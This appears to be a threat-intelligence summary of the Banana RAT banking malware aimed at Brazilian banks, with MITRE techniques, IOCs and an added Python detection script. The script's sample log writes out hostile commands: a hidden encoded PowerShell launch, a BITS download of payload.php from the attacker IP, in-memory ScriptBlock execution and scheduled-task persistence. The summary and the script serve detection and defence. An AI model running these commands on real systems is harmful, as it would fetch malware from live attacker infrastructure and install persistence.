Inside SHADOW-WATER-063’s Banana RAT: From Build Server to Banking Fraud

Keypoints

  • TrendAI MDR recovered both server-side tooling and endpoint-side malware, enabling a full view of Banana RAT’s operational chain.
  • Banana RAT is attributed to SHADOW-WATER-063 and is focused exclusively on Brazilian financial institutions.
  • The delivery chain starts with a malicious batch file, Consultar_NF-e.bat, downloaded from convitemundial2026[.]com and executed via PowerShell.
  • The operator infrastructure uses a FastAPI-based crypter/polymorphism pipeline to generate unique, layered-obfuscated payloads for each victim request.
  • The malware executes largely filelessly in memory, using PowerShell, AES-wrapped payloads, and hidden scheduled-task persistence.
  • Banana RAT supports operator-driven fraud through screen streaming, remote input control, keylogging, clipboard manipulation, overlay injection, and file exfiltration.
  • The campaign includes a Brazil-only Pix QR interception subsystem and targets bank and crypto pages localized for the Brazilian market.

MITRE Techniques

  • [T1059.001 ] PowerShell – Used to fetch, decrypt, and execute staged payloads in memory (‘the batch file launches an obfuscated PowerShell command’; ‘executes the resulting plaintext via ScriptBlock::Create’).
  • [T1620 ] Reflective Code Loading – The decrypted banker is loaded and run directly in memory, so the plaintext payload is never written to disk; the quoted behaviour is in-process loading, not injection into another process (‘a fileless pattern that prevents the decrypted banker from ever touching disk’).
  • [T1027 ] Obfuscated Files or Information – The campaign uses layered obfuscation, polymorphism, junk-code insertion, and AES wrapping to evade detection (‘applies multiple obfuscation layers and an AES-256-CBC wrapper’; ‘Nine in-house obfuscation layers’).
  • [T1105 ] Ingress Tool Transfer – The stager downloads the next-stage payload from attacker-controlled infrastructure (‘downloads payload.php from a second attacker-controlled host’).
  • [T1053.005 ] Scheduled Task – The malware creates a hidden scheduled task for persistence (‘registered a hidden scheduled task configured to execute powershell.exe’).
  • [T1071.001 ] Web Protocols – The operator uses HTTP endpoints for payload staging and campaign infrastructure (‘A single HTTP GET request from the staging cradle to payload.php’; ‘publicly accessible over HTTP’).
  • [T1197 ] BITS Jobs – The larger stager downloads over the Background Intelligent Transfer Service, falling back to WebClient when BITS is unavailable (‘uses Start-BitsTransfer with a WebClient fallback for greater reliability through proxies’).
  • [T1113 ] Screen Capture – The malware continuously captures the desktop and streams JPEG frames to the operator (‘Continuously captures the desktop … and streams JPEG frames’).
  • [T1056.001 ] Keylogging – It records keystrokes in a buffer for later exfiltration (‘captures all keystrokes into a 2,000-entry ring buffer’).
  • [T1115 ] Clipboard Data – The malware monitors and rewrites clipboard contents to redirect payments (‘Clipboard monitoring’; ‘clipboard manipulation’).
  • [T1056.002 ] GUI Input Capture – Overlay injection presents fake banking UI to harvest credentials, while remote input control and input blocking let the operator drive or freeze the victim’s session during fraud (‘overlay injection’; ‘Remote input control’; ‘Input blocking’).
  • [T1204.002 ] User Execution: Malicious File – The victim is tricked into opening a batch file disguised as an invoice document (‘the file users are tricked into downloading is disguised as an electronic invoice document’).
  • [T1140 ] Deobfuscate/Decode Files or Information – The stager decrypts an AES-wrapped payload in memory before execution (‘decrypts the AES-wrapped body using the embedded key and IV’).
  • [T1134.002 ] Access Token Manipulation: Create Process with Token – A duplicated SYSTEM token is used to spawn PowerShell into the interactive user desktop (‘duplicates SYSTEM token and spawns PowerShell into the user interactive desktop’).
  • [T1036.005 ] Masquerading: Match Legitimate Name or Location – The downloaded stage is written to a world-writable public directory under a browser-like filename such as msedge.txt (‘writes it to a world-writable path under a benign filename’).

Indicators of Compromise

  • [SHA256] Malware files and stages – ecdc8fade561a75d68235859ad8b1fe131db2c458b4894268e38e90ecab1c47f, 38dfeb772afbd01c04eddda120d283acfb1147a6dc3d54ac62fe23ad06e39d8f, and 2 more hashes.
  • [File names] Dropped or executed payloads – Consultar_NF-e.bat, msedge.txt, and other staged filenames such as st.txt and st.php.
  • [Domains] Delivery and C&C infrastructure – convitemundial2026[.]com, c[.]windowsk-cdn[.]com, and other associated domains.
  • [IP addresses] Attacker infrastructure and fallback C&C – 24.199.90.58, 162.141.111.227, with the staging service exposed on ports 80 and 443.
  • [URLs] Payload delivery endpoints – hxxp[://]24[.]199[.]90[.]58:80/payload[.]php, hxxp[://]24[.]199[.]90[.]58:80/st[.]txt, and related staging URLs.
  • [Windows paths] Staging and masquerade locations – C:\Users\Public\Documents\msedge.txt, C:\Users\70397\AppData\Roaming\Microsoft\Diagnosis\ETW\msedgeupdate.txt, and other ETW-like paths.
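The technique list and IOCs above translate fairly directly into hunting logic. The following Python script is an added example, not code from Trend Micro or from the report: it runs a handful of behavioural rules keyed to the stages described (invoice-themed .bat spawning PowerShell, an HTTP download cradle via BITS/WebClient, ScriptBlock::Create execution, a scheduled task whose action is powershell.exe, staging under C:\Users\Public) plus straight IOC matching over endpoint telemetry. The JSON-lines event format (fields such as `event`, `image`, `parent_image`, `parent_cmdline`, `cmdline`, `target`, `sha256`) is an assumption loosely modelled on Sysmon process/file/DNS events, and the sample log is constructed for the example; the domains, IPs, hashes and filenames are the ones listed on this page, refanged.

```python
"""
Hunt for the Banana RAT delivery chain in endpoint telemetry.
Added example; not the report's or Trend Micro's code.
Assumed input: one JSON object per line with fields event, image,
parent_image, parent_cmdline, cmdline, target, sha256 (loosely Sysmon-like).
"""
import json

# IOCs copied from the page (defanged there, refanged here).
IOC_DOMAINS = {"convitemundial2026.com", "c.windowsk-cdn.com"}
IOC_IPS = {"24.199.90.58", "162.141.111.227"}
IOC_SHA256 = {
    "ecdc8fade561a75d68235859ad8b1fe131db2c458b4894268e38e90ecab1c47f",
    "38dfeb772afbd01c04eddda120d283acfb1147a6dc3d54ac62fe23ad06e39d8f",
}
IOC_FILENAMES = {"consultar_nf-e.bat", "msedge.txt", "msedgeupdate.txt", "st.txt"}


def _cmd(ev):
    return ev.get("cmdline", "").lower()


def _image(ev, key="image"):
    return ev.get(key, "").lower()


# (rule name, predicate over one parsed event); each maps to a technique above.
RULES = [
    # T1204.002 -> T1059.001: cmd.exe running a .bat spawns PowerShell
    ("bat_spawns_powershell", lambda ev: ev.get("event") == "process_create"
        and _image(ev).endswith("powershell.exe")
        and _image(ev, "parent_image").endswith("cmd.exe")
        and ".bat" in ev.get("parent_cmdline", "").lower()),
    # T1105 / T1197: BITS or WebClient cradle pulling a stage over plain HTTP
    ("http_download_cradle", lambda ev: ev.get("event") == "process_create"
        and any(k in _cmd(ev) for k in ("start-bitstransfer", "net.webclient", "downloadstring"))
        and "http://" in _cmd(ev)),
    # T1140 / T1059.001: decrypted text handed to [ScriptBlock]::Create
    ("scriptblock_create", lambda ev: ev.get("event") == "process_create"
        and "scriptblock]::create" in _cmd(ev)),
    # T1053.005: scheduled task whose action is powershell.exe
    ("schtask_powershell", lambda ev: ev.get("event") == "process_create"
        and _image(ev).endswith("schtasks.exe")
        and "/create" in _cmd(ev) and "powershell" in _cmd(ev)),
    # T1036.005: stage dropped under the public profile with a browser-like name
    ("public_dir_staging", lambda ev: ev.get("event") == "file_create"
        and ev.get("target", "").lower().startswith("c:\\users\\public\\")
        and ev.get("target", "").lower().split("\\")[-1] in IOC_FILENAMES),
    # Direct IOC hits on DNS / network and on file hashes
    ("ioc_network", lambda ev: ev.get("event") in ("dns_query", "network_connect")
        and (ev.get("target", "").lower() in IOC_DOMAINS or ev.get("target", "") in IOC_IPS)),
    ("ioc_hash", lambda ev: ev.get("sha256", "").lower() in IOC_SHA256),
]

CHAIN_STAGES = {"bat_spawns_powershell", "http_download_cradle", "scriptblock_create",
                "schtask_powershell", "public_dir_staging"}


def scan(lines):
    """Return {rule_name: [line indexes]} for every rule that fired."""
    hits = {}
    for i, line in enumerate(lines):
        if not line.strip():
            continue
        ev = json.loads(line)
        for name, pred in RULES:
            if pred(ev):
                hits.setdefault(name, []).append(i)
    return hits


def chain_score(hits):
    """Number of distinct delivery-chain stages seen; 3 or more on one host is a strong signal."""
    return len(CHAIN_STAGES & set(hits))


# Constructed sample telemetry (not real logs): one benign event, then the chain.
# The sha256 on the file_create event is taken from the IOC list only to exercise
# the hash rule; the page does not say which file that hash belongs to.
SAMPLE_LOG = r'''
{"event":"process_create","image":"C:\\Windows\\System32\\notepad.exe","parent_image":"C:\\Windows\\explorer.exe","cmdline":"notepad.exe"}
{"event":"dns_query","image":"C:\\Windows\\System32\\cmd.exe","target":"convitemundial2026.com"}
{"event":"process_create","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","parent_cmdline":"cmd.exe /c Consultar_NF-e.bat","cmdline":"powershell.exe -w hidden -ep bypass -enc AAAA"}
{"event":"process_create","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -c Start-BitsTransfer -Source http://24.199.90.58:80/payload.php -Destination C:\\Users\\Public\\Documents\\msedge.txt"}
{"event":"file_create","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","target":"C:\\Users\\Public\\Documents\\msedge.txt","sha256":"ecdc8fade561a75d68235859ad8b1fe131db2c458b4894268e38e90ecab1c47f"}
{"event":"process_create","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -c $p=[ScriptBlock]::Create($plain); & $p"}
{"event":"process_create","image":"C:\\Windows\\System32\\schtasks.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"schtasks /create /tn Update /tr \"powershell.exe -w hidden -f C:\\Users\\Public\\Documents\\msedge.txt\" /sc minute"}
'''

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.strip().splitlines())
    print(json.dumps(hits, indent=2))
    print("chain stages observed:", chain_score(hits))
```

The rules are deliberately keyed on parent/child relationships and command-line fragments rather than on the obfuscated PowerShell itself, since the crypter pipeline regenerates the encoded stage per request; the IOC sets still catch the fixed infrastructure and staging names quoted above, and `chain_score` lets an analyst require several stages on one host before paging.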


Read more: https://www.trendmicro.com/en_us/research/26/e/banana-rat.html